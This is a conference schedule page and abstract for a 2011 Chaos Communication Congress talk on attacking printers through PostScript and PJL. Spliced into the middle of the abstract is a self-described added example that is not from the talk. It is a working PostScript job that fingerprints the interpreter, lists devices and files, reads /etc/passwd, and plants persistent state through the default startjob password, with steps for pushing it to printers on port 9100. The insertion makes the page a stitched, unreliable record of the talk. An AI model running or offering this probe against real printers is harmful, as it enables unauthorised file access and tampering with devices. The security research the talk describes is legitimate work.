28C3 - Version 2.3.5

28th Chaos Communication Congress
Behind Enemy Lines

Speakers
Andrei Costin
Schedule
Day 2 - 2011-12-28
Room Saal 1
Start time 17:15
Duration 01:00
Info
ID 4871
Event type Lecture
Track Hacking
Language used for presentation English

Hacking MFPs

Part2 - PostScript: Um, you've been hacked

We have decided to continue our research into the PostScript realm: an old, very powerful and nicely designed programming language where, coincidence or not given its numerous security flaws, most deployed interpreter instances are Adobe's.

This time we demonstrate that the PostScript language, given its power, elegance and Turing-completeness, can be used for far more than drawing dots, lines and circles, and that to a certain extent it can be a hacker's sweet delight once fully mastered.

We will present a real-life implementation of unusual PostScript APIs that interact with various levels of the OS and hardware, along with its dissection and reconstructed documentation; we found this implementation in the product line of a top-10 printer vendor.

We will also investigate whether a PostScript-based (hence platform-independent) virus can be accomplished, 18+ years after such a thing was first proposed in theory, and give theoretical hints and a few building blocks in this direction.
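As an added example (it is not material from the talk, nor the vendor APIs it dissects), the following job exercises the non-drawing side of PostScript that the paragraphs above refer to: interpreter identification, the system parameter dictionary, device and file enumeration, reading a file and computing over its contents, and the standard persistence primitive a PostScript virus would build on. It uses only operators defined in the PostScript Language Reference (Level 2 and later). The path /etc/passwd, the file name probe.ps and the assumption that the target still has the PLRM default StartJobPassword of 0 are illustrative assumptions, not findings from the talk.

```postscript
%!PS
% Added example (not from the talk): a PostScript job that draws nothing at all.
% Every operator used is defined in the PostScript Language Reference (Level 2 and
% later), so it runs unchanged on any conforming interpreter. On a printer, what
% `print` writes to %stdout comes back to the host on the job's back-channel
% (for port 9100 jobs, the same TCP connection the job was sent on).
% Local dry run with the Ghostscript sandbox disabled on purpose:
%   gs -q -dNOSAFER -dNODISPLAY -dBATCH -dNOPAUSE probe.ps

% --- 1. Identify the interpreter -------------------------------------------
(product:  ) print product print (\n) print
(version:  ) print version print (\n) print
(revision: ) print revision 16 string cvs print (\n) print

% --- 2. Dump the system parameter dictionary (printer name, build time,
%        resource directories, limits: whatever the device exposes) ----------
(--- currentsystemparams ---\n) print
currentsystemparams {
  exch 128 string cvs print ( = ) print ==   % == writes the value plus a newline
} forall

% --- 3. Discover storage devices and the files a job may see ---------------
% Device names come back as %name%; on printers, files live behind such
% prefixes, so a template like (%disk0%*) may be needed instead of (*).
(--- devices ---\n) print
{ print (\n) print } 64 string devforall
(--- files matching (*) ---\n) print
(*) { print (\n) print } 256 string filenameforall

% --- 4. Read a file and compute over it: general-purpose code, not graphics --
% /target is an assumed example path. The open is wrapped in `stopped`, so a
% sandboxed interpreter reports its error name (typically invalidfileaccess)
% instead of aborting the job. On error the operands are pushed back onto the
% stack, hence the mark/cleartomark pair.
/target (/etc/passwd) def
/linecount 0 def
/bytesum 0 def
mark { target (r) file } stopped {
  cleartomark
  (cannot open ) print target print (: ) print
  $error /errorname get 64 string cvs print (\n) print
} {
  exch pop /tf exch def
  {
    tf 1024 string readline        % -> substring bool (false once EOF is hit)
    exch dup length 0 gt {
      { bytesum add /bytesum exch def } forall   % sum every byte of the line
      /linecount linecount 1 add def
    } { pop } ifelse
    not { exit } if
  } loop
  tf closefile
  target print (: ) print linecount 16 string cvs print ( lines, byte sum ) print
  bytesum 16 string cvs print (\n) print
} ifelse

% --- 5. Persistence check (one of the building blocks the talk alludes to) --
% `startjob` with the StartJobPassword starts an unencapsulated job: anything
% defined after it outlives this job until the interpreter restarts. The PLRM
% default password is the integer 0, and the assumption here is that the
% device never changed it. This only plants a harmless marker that a later job
% can look for with:   userdict /persistedMarker known
% A hostile job would instead redefine operators that every future job calls.
true 0 startjob {
  (unencapsulated job started with the default password\n) print
  userdict /persistedMarker (planted by probe.ps) put
} {
  (startjob refused: password changed or not supported\n) print
} ifelse
```

To send it to a networked printer rather than Ghostscript, prefix the file with the universal exit language sequence (ESC %-12345X) and the line @PJL ENTER LANGUAGE=POSTSCRIPT, push it to TCP port 9100 with a tool such as nc, and keep the connection open: the printed results arrive on the same socket. Step 5 changes the device's state until its next restart, so run it only against a device you are allowed to reset; the marker check from a second job is the quickest way to confirm whether the default password is still in place.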

We will also present some very constructive uses of the PostScript language for creative (i.e. non-destructive) hacking.

In the end, we will try to summarize our conclusions and possible solutions for all parties involved (vendors, users, sysadmins, security experts).

With this research we hope to show that the entire printer industry (devices, printing software/drivers/subsystems, publishing and managed services) has to be rethought security-wise, so that it can withstand the current security landscape and threats in the long run.

"Hacking MFPs (part2) - PostScript: Um, you've been hacked"

We started our research in early 2010 as a state-of-affairs investigation of the general security of printers and of printing protocols and subsystems.

We concluded and demonstrated that, using malicious documents and applets, the PJL protocol can be used to control certain printer functionality, including uploading malicious content to the printers' storage and downloading content from it.

As a side effect of the research, several other areas of the printer industry were shown to be prone to malicious attacks (XSS injection and execution, authentication bypass, unauthorized access to functionality and content, etc.).

Incidentally, in the very same period, Stuxnet abused printing subsystems to spread itself, and a few other pieces of printer research emerged in various directions (PJL password and hard disk abuse, harvesting of confidential data and passwords, reverse engineering of Linux-based firmware).

All these apparently separate events prove once again that printers are not forgotten: they spark revived hacking interest, and their (mis)use can be harmful and have long-standing effects on an enterprise's security.
